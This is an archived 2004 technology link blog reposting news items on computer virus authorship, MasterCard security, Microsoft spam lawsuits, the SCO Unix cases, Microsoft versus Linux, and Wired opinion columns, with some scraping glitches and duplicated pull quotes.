QODS ec

Saturday, June 12, 2004

PROG: CS622 S2001 Distributed Networks Home Page

CS622 S2001 Distributed Networks Home Page

UNIX: SCO - Ancient UNIX

SCO - Ancient UNIX

PROG: OS

OS

PROG: Linked Lists

Linked Lists

PROG: Drawing With Mouse

Drawing With Mouse

PROG: An Othello Game

An Othello Game

PROG: Index of /~anthony/info/C

Index of /~anthony/info/C

PROG: Infrequently Asked Questions in comp.lang.c

Infrequently Asked Questions in comp.lang.c

BOOK: Christophe's C stuff directory

Christophe's C stuff directory

BOOK: C Elements of Style

C Elements of Style

BOOK: Writing Bug-Free C Code

Writing Bug-Free C Code

BOOK: KDE 2.0 Development - Andamooka Reader

KDE 2.0 Development - Andamooka Reader

LINK: programmingsite.co.uk :: programming resources in various categories

programmingsite.co.uk :: programming resources in various categories

LINK: {Codepage 2.3}

{Codepage 2.3}

LINK: CSPP 51081 Home Page

CSPP 51081 Home Page

Friday, June 11, 2004

VIRUS: Who's Getting Rich on Computer Viruses?

NewsFactor Network - Network Security - Who's Getting Rich on Computer Viruses?

By Justine Brown
Enterprise Security Today
June 9, 2004 2:42PM

"If you're that good of a programmer, you have a bright future ahead, but it's not in writing viruses," said David Perry of Trend Micro. "We need to continue to pursue and apprehend and punish virus writers, and put out the message this is not acceptable behavior."

Computer viruses cost businesses and consumers around the world billions of dollars each year. So who -- if anyone -- is profiting from viruses? And if no one is profiting, what is the motivation behind virus creation? The answers are not completely clear.

"Almost all viruses are written for the same reason that people put graffiti on walls," said David Perry, global director of education at Trend Micro Latest News about Trend Micro. "It's simply a desire to claw their initials into the middle of your hard drive."

Yet, recent events have uncovered what may be a new trend: spammers paying virus writers to create worms that plant an open proxy, which the spammer then can use to forward spam automatically. Many suspect this occurred with the SoBig virus.

Spam Engines

"Worm authors are using their worms to become spam engines," said Christian Byrnes, senior vice president of technology research services at Meta Group Latest News about Meta Group. "The worm spreads itself over the Internet and then into people's computers. It doesn't do any damage; it just becomes a spam pass-through -- an e-mail relay. The spammer can then send an address list and a piece of spam, and the person's home computer will send out thousands of e-mails to people all over the world without their knowledge."

A D V E R T I S E M E N T
With increasing numbers of states passing legislation banning spam, and Internet service providers cracking down on those that abuse their systems, worms may be the next-best choice for spammers.

Using worms to send spam via such paths makes it extremely difficult to identify the item as spam and to trace the true sender.

Opportunistic Spammers

But it is also possible that spammers are using such open proxies without having any connection to the virus writers, according to Perry.

"They can scan the Internet looking for open proxies. Someone might have found SoBig and reported it to other spammers to use. We don't have any hard evidence that the SoBig writer received any money," he said.

A D V E R T I S E M E N T
Looking for Mischief

If the spam connection does not exist, then who is creating viruses? Primarily kids, Perry maintains -- and increasingly, groups of kids. "As we move forward, we're seeing a change in the nature of virus writing," he said.

"Instead of one kid sitting down and writing a computer virus Latest News about computer virus, now we get an Internet club of kids writing viruses together. Between them, they put out something that's a lot bigger technology than one of them could put out alone."

But most viruses are poorly written programs that are not difficult to create. "The famous Anna Kournikova virus was written by a kid that didn't know any computer programming at all," said Perry. "He went to a Web site that generated the virus for him."

Both Perry and Byrnes reject any speculation that virus companies themselves generate viruses to create a market for their products. "If we were doing that, the FBI would have uncovered it by now," said Perry.

A D V E R T I S E M E N T
Future Not Bright

Despite crackdowns and well-publicized arrests, such as that of the 18-year-old German student charged last month with creating the Sasser virus, the creation of new viruses is not likely to end anytime soon. The Sasser arrest may chill virus writing briefly, but as another generation of teenagers emerges, it will likely pick up again.

Preventing the spread of such viruses, therefore, is a more effective strategy than trying to stop them altogether.

Much of that effort involves education, and efforts are being made on a national level. In April, the Department of Homeland Security and the National Science Foundation announced an agreement to co-sponsor and expand the existing NSF Federal Cyber Service: Scholarship for Service program. The partnership will help strengthen cyber security by promoting higher-education courses that increase the number of information-security professionals trained to protect public- and private-sector I.T. systems.

Ethics Message

Meanwhile, Perry currently is working with a task force created to increase awareness of, and education about, computer viruses. Part of that effort involves trying to get an ethics message across to kids likely to write viruses.

"It's hard not to make it sound cheesy," he said. "We want to tell them we aren't impressed. If you're that good of a programmer, you have a bright future ahead, but it's not in writing viruses. We need to continue to pursue and apprehend and punish virus writers, and put out the message this is not acceptable behavior."

User education is also critical. Much of what causes viruses to spread can be summed up as "social engineering," according to John Pescatore, vice president and research fellow at Gartner Research.

Perry agreed.

"The love letter virus said, 'I love you.' Everyone wants to be loved, so they opened it," Perry said. "The Anna Kournikova virus said, 'Here's a naked picture of Anna Kournikova,' and everyone wanted to see a naked picture of Anna Kournikova, so they clicked on it. When addressing the dynamic of computer security, there's a large component of it that simply has to do with educating users not to open documents that could contain viruses."

SEC: MasterCard: Risk is in the cards

MasterCard: Risk is in the cards | Newsmakers | CNET News.com


By Ong Boon Kiat
Special to CNET News.com
http://news.com.com/2008-1029-5231474.html

Story last modified June 11, 2004, 8:06 AM PDT

Advertisement
toshibadirect.com

Instead of a jargon-filled dissertation, MasterCard's new regional head of security, Tim Morris, gave a cheerful and low-tech answer when asked how he tackles security in his line of work.

"Consultation, consultation, consultation," said the burly Australian, who is four months into his tenure as MasterCard's Asia-Pacific vice president and regional head for security and risk management.

"It's like location, location, location in real estate," he said. "There's just no substitute for sitting down and talking to your client, because the better you understand them, the better your solutions will be."


Get Up to Speed on...
Enterprise security
Get the latest headlines and
company-specific news in our
expanded GUTS section.



Morris, a 20-year industry veteran who served as the chief of counterterrorism in the Australian Federal Police before he joined the credit card industry, now spends a huge chunk of his time coaxing MasterCard holders into adopting the counter-fraud measures developed by his 10-person team in Asia. Through that, he has learned how tough it can be to create a common security solution that satisfies each member's unique requirements.

"For me, that's the biggest challenge," he said.

So what else does he find challenging about managing people and security?

Q: What threats will e-commerce face in the next five years?
A: Global payment is certainly not immune from globalization. We've seen issues like identity theft really starting to become high-profile in the United States. For example, you look at "phishing" Web sites--they are really exploding around the world now.

The problem is this: Today's criminal doesn't have to be geographically co-located with the scene of the crime. He could be sitting in an office in Uzbekistan, and the victim could be in Singapore or Sydney. That's one of the challenges that law enforcement have to grapple with every day. There's no quick solution to that one.

We are certainly seeing a higher take-up rate of people who are comfortable using electronic commerce, which unfortunately also means that you have a rising pool of potential victims out there.

The solution to that is to educate the public; to make them more security-aware when using electronic commerce platforms.

But public education can never be foolproof, right?
That's where risk management comes in. You need to know where your greatest risks are and how to measure those risks. It's what MasterCard's site data protection program tackles. It does (a) security scan of Web sites to look for vulnerabilities. And it offers proactive monitoring and alert services.

With this program, what we are trying to say is: We want the merchants that use our system to be well safeguarded and have comprehensive security systems. We want the customers who deal with the merchants to be able to deal with them in confidence.
With non-face-to-face credit card transactions becoming more popular, a photo really doesn't help you.
Our other initiative, SecureCode, is another way which we impart a higher level of confidence to users when they are using the Internet.

I don't think we are ever going to produce a silver bullet that's going to be the answer for everybody's security concerns. Rather, it is a series of measures being implemented, with each one being more sophisticated and comprehensive. It's a matter of evolution.

Could the worsening situation of computer virus attacks derail e-commerce?
It could be (serious enough to directly impact e-commerce), but I don't think multinational companies like MasterCard are directly at risk. We have got pretty sophisticated safeguards to protect against them.

However, I think that the merchant who isn't as e-savvy, who is small and has limited resources to apply (relevant countermeasures), will be more vulnerable. That's why programs like our site data protection program are relevant.
As MasterCard rolls out new solutions, like the recent wireless PayPass and Web-based SecureCode, do you find that convenience and security are incompatible?
Not really. Of course, the easy way to make the most convenient system in the world is to ignore privacy and security. Likewise, making the most secure and private system in the world is not difficult, only that you wouldn't be able to use it anywhere.

So how do you deliver a system that does both? The answer is technology.

With the solutions that are out there today, it is a matter of sorting through them, testing them and making sure that we get the right one. In the end, I'm confident that everyone's needs will be met.

But with more people getting jumpy about security, do you see the balance tipped at some point, with credit card companies sacrificing convenience in order to bump up security?
My tip is: Invest in a paper shredder in the office.
Hard to say, if only because new technologies are constantly arriving on the market, and that means that the planners have to reassess what could be delivered in terms of payment cards. So because things are so dynamic, it is difficult to predict exactly what manifestation would happen next.

Which credit card security technology is hottest now?
Well, there is now a major commitment from major card payment players toward chip-based credit cards. This move is significant because we now have the issue of shifting liabilities.

Explain what you mean by shifting liabilities.
If an issuer has a chip-enabled card, and an acquirer does not have a chip-enabled terminal, then any charge-back liability will shift to the acquirer. Likewise, if the acquirer has a chip-enabled terminal, and an issuer has a non-chip card, then the liability will remain with the issuer. So (the aim) is to encourage the industry to embrace chip-based credit card platforms.

Or force the acquirer to get chip-enabled terminals?
Well, that's the choice that they have to make, but I would. But it is also a big investment for the issuer, so it is a collective effort.

What is the impact of all this on the consumer?
For the consumers, chip-enabled cards mean more security, because there's far more (security measures) that can be delivered with chip-enabled cards. And since consumers won't be impacted at all in terms of liabilities, they will be the big winners, because they now have a more secure payment product in their pocket.

On the subject of credit card security, why do you think photo identification credit cards aren't more popular today?
It's interesting, you know.
I think you would be amazed what some people would leave in their laptops. There's a lesson to be learned there.
Citibank in Australia has a photo ID card, and that's one of its main marketing strategies, but there hasn't been much take-up. Of course, it's up to the financial institutions that issue credit cards whether they want a photo on them or not, but for reasons known to them, it is something that they seem to deem unwarranted.

Why?
Well, I think that if you have a white piece of plastic, you could basically screen or print anything that you like on it, and that includes photos. So if you were the thief, you could print a photo just as easily as you would other data. It is possible to counterfeit the photo as well, just like passports can be counterfeited.

And with non-face-to-face credit card transactions becoming more popular, a photo really doesn't help you there.

Don't get me wrong. I'm not against photo ID credit cards, but once again, it is not the silver bullet that's going to solve your problems.

For someone who deals with security intimately, what advice would you offer information technology managers in Asia on your pet topic?
The latest craze in the United States is the (document) shredder. And sales of shredders have just gone through the roof there. This tip might sound basic, but it is not silly. Americans now are learning to take care of their confidential information. And this is very important, because out-of-sight isn't out-of-mind when it comes to data.

So my tip is: Invest in a paper shredder in the office.

What's your second tip?
Tip No. 2 would be to protect data on your laptop with proper policies and data protection techniques. Just before I left the Australian Federal Police (early this year), the Australian government did an audit of laptops in various Australian government departments, and I think they found out that 300 were missing. So the next question is: What's on those laptops? I think you would be amazed what some people would leave in their laptops. There's a lesson to be learned there.

One last tip?
Ask questions. Be inquisitive. IT managers need to (constantly ask) other business units about the impact caused by the measures that they are taking. I mean, it's getting complex now, and you really need to ask questions to find out. Unless you ask often, you won't really find out what the impact is.

And as you implement measures, it's also about making users downstream aware of the benefits of your measures. Make them aware that (these measures you are implementing) are going to have a positive impact on their bottom line--even though they may seem inconvenient and (return on investment) may not always look obvious.

M$: Microsoft sues eight alleged spammers

Microsoft sues eight alleged spammers - Computerworld: "News Story by Grant GrossJUNE 11, 2004 (IDG NEWS SERVICE) - Microsoft Corp. has filed lawsuits against eight alleged spammers under a new U.S. antispam law that went into effect in"

News Story by Grant Gross

JUNE 11, 2004 (IDG NEWS SERVICE) - Microsoft Corp. has filed lawsuits against eight alleged spammers under a new U.S. antispam law that went into effect in January.

Microsoft is accusing the defendants of violating the Controlling the Assault of Non-Solicited Pornography and Marketing (CAN-SPAM) Act by falsifying their domains, routing e-mail through open proxies, deceiving customers with misleading subject lines and failing to include unsubscribe options in their e-mails.

Each of the defendants allegedly sent millions of e-mail messages, soliciting a variety of products including body-part enlargement pills, prescription drugs, dating services, university degree programs and work-at-home and get-rich-quick scheme offers. The eight new lawsuits don't include major spammers, but some of the defendants sent out hundreds of millions of pieces of unsolicited e-mail, according to a Microsoft spokesman.

Microsoft intends to continue filing spam lawsuits until spammers stop sending unsolicited e-mail, the spokesman said.

Four of the spam cases were filed June 2, with four more filed yesterday. In addition, three spam cases that Microsoft filed in December have been amended within the past two weeks to name defendants. The cases, filed in Washington state, ask the court to order the alleged spammers to stop creating Microsoft Hotmail accounts and to stop hijacking Microsoft computers to send spam.

Microsoft is seeking unspecified damages.

One of the eight new cases is against a defendant listed on the Register of Known Spam Operations (ROKSO), operated by the Spamhaus Project. Over the past year, Microsoft has filed more than 80 legal actions against spammers, including 51 in the U.S., according to the company. Nine of those U.S. lawsuits were against alleged spammers on the ROKSO list, including five on ROKSO's top 10 list.

In late April, the U.S. Federal Trade Commission filed CAN-SPAM-related charges against two alleged spamming companies.

LINUX: Mixed rulings advance two SCO cases

Mixed rulings advance two SCO cases | CNET News.com

By Stephen Shankland and Dawn Kawamoto
Staff Writer, CNET News.com
http://news.com.com/2100-7344-5231756.html

Story last modified June 11, 2004, 10:50 AM PDT

Advertisement
toshibadirect.com

The SCO Group won two and lost two in its Unix-related lawsuits against IBM and Novell, with a federal judge issuing rulings that, among other things, granted SCO's request to delay the IBM trial.

SCO's case against IBM, which alleges that Big Blue violated its Unix contract with SCO by moving proprietary software to Linux, had been set for April 2005, but Judge Dale Kimball of U.S. District Court in Utah pushed the five-week trial back to Nov. 1, 2005, according to court documents filed Thursday.

SCO's assertions that Linux is tainted with proprietary Unix intellectual property sent tremors through a computing industry that has eagerly embraced the open-source operating system. But the case began nearly a year and a half ago--almost an eternity in the fast-paced technology world--and SCO's foes have been impatient to see what SCO claims the infringements are.

IBM's countersuit includes three claims that SCO violated IBM patents, which SCO had sought to split into a separate case. Kimball denied that request.

In a separate ruling in the Novell case on Wednesday, Kimball denied SCO's request to move the case to state court. Novell, an earlier owner of Unix, argues it never transferred the operating system's copyrights, and SCO sued to try to establish its ownership.

In SCO's favor, Kimball also denied Novell's motion to have the case thrown out based its interpretation of contracts governing the sale. However, for SCO to meet the requirements of its "slander of title" charge, the judge said SCO had to amend its claim by July 9 with specific claims of financial damage stemming from Novell's actions.

The latest movements may be welcome by eager observers of the case. SCO's claims, often made in interviews and news conferences, have inflamed Linux advocates, who have responded in kind with investigations into the history and source code of Linux and Unix.

Despite SCO's request that the IBM case be delayed, the clock is ticking. SCO had a $15 million net loss for its most recent quarter, $4.4 million of which was from its SCOsource lawsuits and largely unsuccessful efforts to get Linux users to buy SCO intellectual property licenses to avoid legal actions.

CEO Darl McBride said Thursday that SCO's $61.3 million in cash and marketable securities is enough to see the cases through.

Kimball changed the IBM case schedule because of the new counterclaims IBM added to the case after the initial schedule was made and because the judge declined to separate those counterclaims, he said.

SCO also sued AutoZone and DaimlerChrysler for their Unix and Linux dealings, while Linux seller Red Hat sued SCO to try to disprove accusations that Linux code is tainted with copyrighted Unix code, which the SCO Group claims to own.

An 'ambiguous' contract
Kimball indicated there's room for interpretation in whether a 1995 Asset Purchase Agreement and 1996 amendment really did transfer copyrights--as SCO argues and Novell disputes--when Novell sold at least some elements of its Unix business to SCO's predecessor, the Santa Cruz Operation.

The APA specifically excluded all copyrights from transfer, but the amendment then added into the transfer "the copyrights and trademarks owned by Novell...required for (the Santa Cruz Operation) to exercise its rights with respect to the acquisition of Unix and UnixWare technologies."

These documents are "ambiguous," Kimball said, and not enough to convince him immediately that the copyrights had been transferred.

"It is questionable on the face of the documents whether there was any intention to transfer the copyrights as of the date the agreement was executed," Kimball said. "The amendment contains no transfer language in the form of 'seller hereby conveys to buyer'...Moreover, the use of the term 'required' in (the amendment) without any list or accompanying list or definition of which copyrights would be required for SCO to exercise its rights in the technology is troublesome, given the number of copyrighted works involved in the transaction."

LINUX: SCO Ruling May Threaten Linux's Progress in Enterprise

SCO Ruling May Threaten Linux's Progress in Enterprise

M$: Where, Oh Where Is Windows XP SP2?

Where, Oh Where Is Windows XP SP2?

M$: Linux threat is rising

Microsoft: Linux threat is rising | CNET News.com

By Graeme Wearden
Special to CNET News.com
http://news.com.com/2100-7344-5231561.html

Story last modified June 11, 2004, 10:05 AM PDT



More companies are using the threat of Linux when negotiating deals with Microsoft, one of the company's senior executives has admitted.

A year after a letter from Microsoft CEO Steve Balmer to his employees acknowledged the Linux threat looming on the horizon, Microsoft remains adamant that open-source software isn't a serious

competitor on the desktop today. However, it may well be forcing Microsoft's prices down.

"It's definitely more of a threat than it was," said Nick Barley, director of marketing at Microsoft, when asked whether more businesses are telling Microsoft that they're planning to migrate to Linux rather than to one of its own operating systems or applications in the hope of getting a better deal.

Barley wouldn't say how successful this tactic has been.

"It shouldn't be successful if we have built appropriate value-based relationships with our customers, so that they appreciate the extra value that we offer," Barley said, speaking at a Microsoft event in London. The '20:20 Seminar Series: Microsoft Windows and Linux' event was billed as an "open and honest technology discussion" and included speeches from Microsoft executives and independent parties.

According to Philip Dawson, senior program director at Meta Group, Linux poses just as significant a threat to Unix vendors as it does to Microsoft. He pointed out that it's simply good business sense in negotiations with a potential supplier to make clear that you're seriously considering using their rivals instead, even if you're not.

"It's true to say that Linux is a tool for trying to beat Microsoft up," Dawson said.

Microsoft used Thursday's event to try to dispel "the myths" surrounding Linux. A key plank in its argument is that open-source software isn't cheaper in the long run because companies need to spend more on retraining IT staff who may be experienced in Windows software but not in the open-source arena.

"We asked an audience of 250 or 300 businesspeople today if they thought that Linux was a free option, and no hands went up," said Nicholas McGrath, head of platform strategy at Microsoft.

McGrath also cited a series of recent customer wins, including the London borough of Newham's decision to go with Microsoft rather than open-source options. McGrath claimed that Newham can look forward to potentially twice the productivity-associated cost savings than if they had gone down the open-source road.

Those familiar with the Newham case, though, say it is actually a prime example of Microsoft cutting its prices when facing the threat of Linux.

Last year, a consultancy firm called netproject presented Newham with an open-source alternative to using Microsoft, and it is thought that this forced Microsoft to put a much more attractive offer on the table.

Speaking in January after Newham had made its decision, netproject's director, Eddie Bleasdale, said that "whenever netproject demonstrates an open-source solution to a Microsoft customer, they suddenly find Microsoft's approach much more amenable."

"Microsoft's reaction to Newham's decision to use netproject's Secure Open Desktop Architecture proves that it is a credible and viable alternative," Bleasdale added.

Netproject is now running an 'incubator club' for companies that want to learn about the potential benefits of open source.

McGrath declined to disclose further details about Microsoft's deal with Newham, but said more information would soon be released.

Paul Hartigan, chief executive of PharmiWeb Solutions--who attended the event as an example of a satisfied Microsoft customer--said he would welcome more visibility regarding Microsoft's pricing structure.

PharmiWeb recently chose to use Visual Studio .Net rather than J2EE or Eclipse, the Linux-based open-source tool, as the development environment for a portal it has built for the health-care sector. Hartigan said the top reason for making this decision was that Microsoft was a "one stop shop" for PharmiWeb's various needs.

NEWS: Antitrust Smackdown

Wired 12.06: VIEW

VIEW


VIEW|question

Pat Mooney
Executive director, ETC Group
There have been 11 negative studies on nanotech's effect on health and the environment, and they're coming from DuPont and NASA and major universities, not from Greenpeace. Meanwhile, products with nanomaterials are slipping through FDA loopholes and making it to market without proper testing.

* Start

* Sun is just a pawn in Microsoft's game
* Linux's potty-mouthed programmers
* The 20-MHz running shoe
* The Great Egg of China
* Desperately seeking Sasquatch
* More »

* Play

* Inside Spielberg's Terminal
* Simball wizards and open sourcery
* Geeking out at Seattle's sci-fi museum
* Fetish: Technolust
* Test: Consumer reviews
* More »

* View

* The organization outsmarts the CEO
* Hot Seat: Time Warner's cable guy
* Sterling: How political purges will kill American science
* Lessig: Europe's swat at Microsoft hits us all
* More »

Kevin Ausman
Executive director for operations, Center for Biological and Environmental Nanotechnology, Rice University
It's always dangerous to take early studies and try to make generalizations. Nanotech is certainly not completely new or unnatural. Natural nanomaterials are released in the environment - through forest fires, volcanic eruptions, diesel exhaust. Once we figure out what's analogous to current systems, we'll find that we have already done a lot of the work of testing.

Christine Peterson
President, Foresight Institute
A huge number of new chemicals are produced every year, and 85 percent of those submitted to the EPA have no health data at all. But bringing the industry to a standstill is not the answer. The way to drive forward is to speed development of molecular manufacturing.



VIEW|essay

American companies are suffering from a personality crisis. They talk about the virtues of flattened hierarchies and bottom-up organizations, and they laud the genius of the market. But when it comes to what they actually do, companies prefer authoritarianism to democracy. Success, most corporations assume, depends on the efforts of a few superlative individuals. As a result, they treat their CEOs as superheroes, look on most of their employees as interchangeable drones, and remain fond of command-and-control strategies that wouldn't have been out of place in the Politburo. In doing so, firms are neglecting their most valuable resource: the collective intelligence of the organization as a whole.


Instead of looking to a single person for the right answers, companies need to recognize a simple truth: Under the right conditions, groups are smarter than the smartest person within them. We often think of groups and crowds as stupid, feckless, and dominated by the lowest common denominator. But take a look around. The crowd at a racing track does an uncannily good job of forecasting the outcome, better in fact than just about any single bettor can do. Horses that go off at 3-to-1 odds win a quarter of the time, horses that go off at 6-to-1 win a seventh of the time, and so on. Decision markets, like the Iowa Electronics Markets (which forecasts elections) and the Hollywood Stock Exchange (which predicts box office results), consistently outperform industry forecasts. Even the stock market, though it's subject to fads and manias, is near-impossible to beat over time.

By contrast, while it's clear that some CEOs are excellent leaders and managers, there's little evidence that individual executives are blessed with consistently good strategic foresight. In fact, in an extensive study of intelligent CEOs who made disastrous decisions, Dartmouth's Sydney Finkelstein writes, "CEOs should come with the same disclaimer as mutual funds: Past success is no guarantee of future success." Even when executives are smart, they have a hard time getting the information they need - at so many firms the flow of information is shaped by political infighting, sycophancy, and a confusion of status with knowledge. Hierarchies have certain virtues - efficiency and speed - as a way of executing decisions. But they're outmoded as a way of making decisions, and they're ill-suited to the complex strategic landscapes that most companies now inhabit. Firms need to aggregate the collective wisdom instead.

One intriguing method of doing this is to set up internal decision markets, which firms can use to produce forecasts of the future and evaluations of potential corporate strategies. Few companies have tried such markets. But the few examples we have suggest that they could be very useful. In the late 1990s, for instance, Hewlett-Packard experimented with artificial markets to forecast sales. Only 20 to 30 percent of employees participated, and each market ran for just a week, with people trading at lunch and in the evening. The market's results outperformed the company 75 percent of the time. Even more impressive was a recent experiment at e.Lilly, a division of Eli Lilly, which set up a market to test whether it was possible to distinguish between drug candidates likely to be approved by the FDA and those likely to be rejected. Realistic profiles and experimental data for six hypothetical drugs were devised by e.Lilly, three of which it knew would be approved and three rejected. When trading opened, the market - made up of a diverse mix of employees - quickly identified the winners, sending their prices soaring, while the losers' prices sank.

The evidence is clear: groups - whether top executives evaluating a potential acquisition or sales reps and engineers analyzing a new product - will consistently make better decisions than an individual. Companies have spent too long coddling the special few. It's time for them to start figuring out how they're going to tap the wisdom of the many.
James Surowiecki (jamessuro@aol.com) is The New Yorker's financial columnist and the author of The Wisdom of Crowds.



VIEW|hot seat

Cable TV is like a crappy pizza joint: You can order a small, medium, or large pie, but you can't design your own - and no slices. Put off by increasing cable TV fees, US senator John McCain aims to introduce legislation to force providers to offer an à la carte menu as a way to rein in monthly bills and expand subscribers' choices. We asked Time Warner Cable chair and CEO Glenn Britt to get in front of any regulation and give his customers the option now.


WIRED: You're already giving us video-on-demand and DVRs. Isn't à la carte cable TV the logical next step?
BRITT: À la carte is really a step backward - you would end up with a lot less choice, less diversity. People like having maximum choice. We carry many channels that appeal just to niche groups and minorities. It's by no means clear those could survive in an à la carte regime.

So those channels aren't really supported by the marketplace. If I could pay for just the channels I want, I'd be a lot more valuable to advertisers.
Cable isn't about having a few channels that appeal to everybody, it's about having a lot of channels that appeal to everybody. You may not watch C-Span every night, but it's good to know it's there.

Sure, good for C-Span and Time Warner. But as a consumer, I'd rather lower my bill by paying for only the channels I actually watch.
The myth is that if you pay $60 a month and get 100 channels, then you could buy 50 and cut your price in half. That isn't how the economics work; there are a lot of fixed costs. You'd most likely end up with people paying the same amount of money for fewer channels. It's analogous to a newspaper or magazine. Hardly anybody reads every article in the paper; you read selectively. But nobody says, "Gee, you should only buy the sports section if that's all you want."

Cable and satellite are in cutthroat mode. Couldn't à la carte be an opportunity for you to differentiate Time Warner Cable from its competitors?
If that's what people wanted, yes. But the assumption is wrong. Every time we've tried to offer more packages with fewer channels - more toward à la carte - consumers always went for the big packages. People actually like this service, which is why 90 percent of the homes in the country buy it.

- Lucas Graves



VIEW|sterling

The Union of Concerned Scientists in a February report pointed out something the science press has known for years: The Bush administration has no respect for science. Ideologues prefer to make up the laws of nature as they go.


Presidential science adviser John Marburger complained that the UCS's account sounded like a "conspiracy theory report." That's because it is one. As the report amply documents, the Bush administration has systematically manipulated scientific inquiry into climate change, forest management, lead and mercury contamination, and a host of other issues. Even as Marburger addressed his critics, the administration purged two advocates of stem-cell research from the President's Council on Bioethics.

When politicians dictate science, government becomes entangled in its own deceptions, and eventually the social order decays in a compost of lies. Society, having abandoned the scientific method, loses its empirical referent, and truth becomes relative. This is a serious affliction known as Lysenkoism.

Trofim Lysenko was Joseph Stalin's top stooge in Soviet agricultural science, a field that was mercilessly politicized by fanatics. His specialty was inventing nutty schemes - things like stimulating the evolution of trees by overcrowding them to get them to cooperate, as though they were communist minions. This totalitarian huckster spent his whole career promising exciting results and bringing about only disaster. But the party never judged itself on results, so he always got a free pass.

Politics without objective, honest measurement of results is a deadly short circuit. It means living a life of sterile claptrap, lacquering over failure after intellectual failure with thickening layers of partisan abuse. Charlatans like Lysenko can't clarify serious, grown-up problems that they themselves don't understand.

State-sponsored pseudoscience always fails, but slowly, like a wheat field choked with weeds. (This is a particularly apt comparison, because Lysenko claimed that the weeds infesting Soviet wheat fields had evolved from the wheat itself.) It fails in predictable ways, and these are the very ways in which the Bush science policy is going to fail.

The rot begins to set in when honest local institutions, appalled by high-level misdeeds, denounce federal policy as corrupt and corrupting, just as the UCS has done. There will be much more of this: congressional investigations, high-minded committees. Government officials will temporize by getting scientists to "compromise" and "split the difference" between actual science and partisan jiggery-pokery. This will fail because science just isn't politics. You can't legislate that E=mc21¼2.

Before long, the damage will spread beyond our borders. International scientific bodies will treat American scientists as pariahs. This process has already begun in bioethics, meteorology, agriculture, nuclear science, and medicine, but doubts will spread to "American science" generally. (In Lysenko's heyday, when scientists abroad came across a halfway-decent Soviet scientist, they would charitably offer to publish his books offshore, then maybe help him defect to someplace where he could get serious work done.)

Meanwhile, gaps will open between research establishments in the US and other countries, much like the one that now yawns between American and Korean stem-cell producers. US science will come to have a stodgy, old-fashioned, commissar-style inability to think and act freely. Yankee initiative and ingenuity will bow to bulging pie-in-the-sky superprojects like unproven antimissile systems, hot-air broadband initiatives, and swashbuckling moon shots.

Eventually the whole vast bubble will burst of its own fairy-tale unreality. Few will be held accountable. The quackeries will be purged, forgotten, hushed up. Except, that is, for the lasting effect on the health, morale, and self-esteem of the American people.

Trofim Lysenko was a funny case. He had the authority to reduce a major scientific-research power to a dismal Burkina Faso with rockets; he left behind practically no scientific achievement or discovery. As a scientist, he was a nonentity, but his menace is universal. Wherever moral panic, hasty judgment, arrogance, fear, brutal partisan ignorance, slovenly standards of research, overcentralization of authority, conspiratorial policymaking, jingoism and xenophobia, and spin-centric travesties of disinformation can flourish, Lysenko's spirit will never die.
Email Bruce Sterling at bruces@well.com.



VIEW|lessig

Microsoft will appeal its second significant antitrust defeat in June. This time, the loss is Europe. After the company failed to persuade regulators that its practices benefit consumers, the European Commission fined Microsoft $600 million, and imposed a series of restrictions that go far beyond those ordered by the US over three years ago.


It's no surprise that the company lost again. Much of the European case was a rerun of US v. Microsoft. Nor is it a surprise that the result is harsher. That's the nature of competition law in Europe. But this rerun with a kicker shows the profound harm that disharmonized antitrust law does to competition in general - and to Microsoft in particular. The kicker here goes one antitrust theory too far.

The EC charged Microsoft with tying Windows Media Player into its operating system. That makes it harder, the EC says, for similar media products (like RealAudio) to compete. The commission thus ordered Microsoft to offer two versions of Windows: one with the media player, and one without.

Tying was at the core of the US case as well. But the tying alleged by the US was different, at least in part, from that alleged by Europe. In the US lawsuit, the government proved that Microsoft was using its power to defend its Windows monopoly against OS competition. (Disclosure: I served as special master in the dispute, advising the government on the technological issues of the case until Microsoft got me removed in 1998.) By "integrating" Internet Explorer into Windows, the company made it harder for other browsers to compete. That was an antitrust problem because the other browsers were thought (at least by Microsoft) to be the first step toward a platform-independent network - if developers started coding for a non-Microsoft world, then the power of the company's OS monopoly would begin to erode.

Economists are increasingly skeptical about whether, in general, tying actually harms competition. The only clear case is when a monopoly ties a product to protect its market dominance - as the US proved Microsoft did. Yet that theory is subtly, and significantly, different from the EC's theory.

European regulators argue that Microsoft is tying its OS to an application (a media player) to ensure dominance in the application's market. If Windows Media Player is everywhere, then everyone will develop content to its standards only. That will tip media-content development to a single platform, the EC worries, and weaken competition in applications to develop and spread that content.

Maybe. But a media player is not an operating system. And while dominance in a particular market will certainly benefit the underlying OS, as long as the media app continues to be available on alternative operating systems, it doesn't further tilt a platform war. Admittedly, Microsoft was slow to maintain cross-platform compatibility, but versions of Windows Media Player are now available on platforms from Mac OS X to Solaris. Microsoft has also licensed the technology to the makers of other media players. This clearly promotes the use of Windows Media Player, but its popularity doesn't depend on Microsoft's OS monopoly.

The EC ruling shows that Microsoft continues to suffer the unending burden of a silly defense and an undeserved victory in the US case. Its Alice in Wonderland arguments eroded Redmond's credibility to anyone who knows anything about how software actually works. (Sophistry about whether it was possible to separate a browser from an OS might earn you a hearing in a federal court, but it earns you only contempt everywhere else.) And when the Bush Justice Department's subsequent actions effectively reversed the US district court ruling, it only strengthened the resolve of others to pick up where the US had left off.

Microsoft has tried to signal a break from its past. The EC decision shows it has not yet succeeded. Although there have been many changes at the company, many of us still believe it will use its power to protect itself against competition. And as the spread of Linux increasingly suggests that life without Microsoft is possible, the world will be even less concerned with imperfect justice in its response to a proven monopolist.

That's too bad - for competition, and for Microsoft. The burden of answering many conflicting masters is costly for any competitor. And if every Microsoft innovation launches an antitrust investigation, then innovation will move to companies that don't pay such a high price. Microsoft needs to solve its antitrust problems. Soon.
Email Lawrence Lessig at lawrence_lessig@wiredmag.com.

M$: Microsoft goes on a 'myth-busting tour'

Microsoft goes on a 'myth-busting tour' - News - ZDNet
By Jo Best
Silicon.com
June 11, 2004, 5:38 AM PT
URL: http://zdnet.com.com/2100-1104-5231375.html

Microsoft has launched its 'Get the Facts' road show--the tech equivalent of a political battle bus--to tour the country and convince the wavering that Redmond is as at least cheap and as secure as its open-source rival.

Nick McGrath, Microsoft's head of platform strategy, described the campaign as "a reality check we're bringing out", aiming to tackle the "myths" surrounding Linux.

One of the myths that's getting Microsoft's goat is the term 'free'. At the London leg of the road show, not one attendee raised their hand when asked if they believed Linux was free--after all, Linux vendors aren't giving their Linux products away for nothing.

Meta Group analyst Philip Dawson said consumers should bear in mind that while Linux itself is free, that's not the whole story. "It's a free component--it's not a free platform, it's not a free service--it's a free component," he said.

But what about the old adage that it's not free as in free lunch but more free as in freedom of speech?

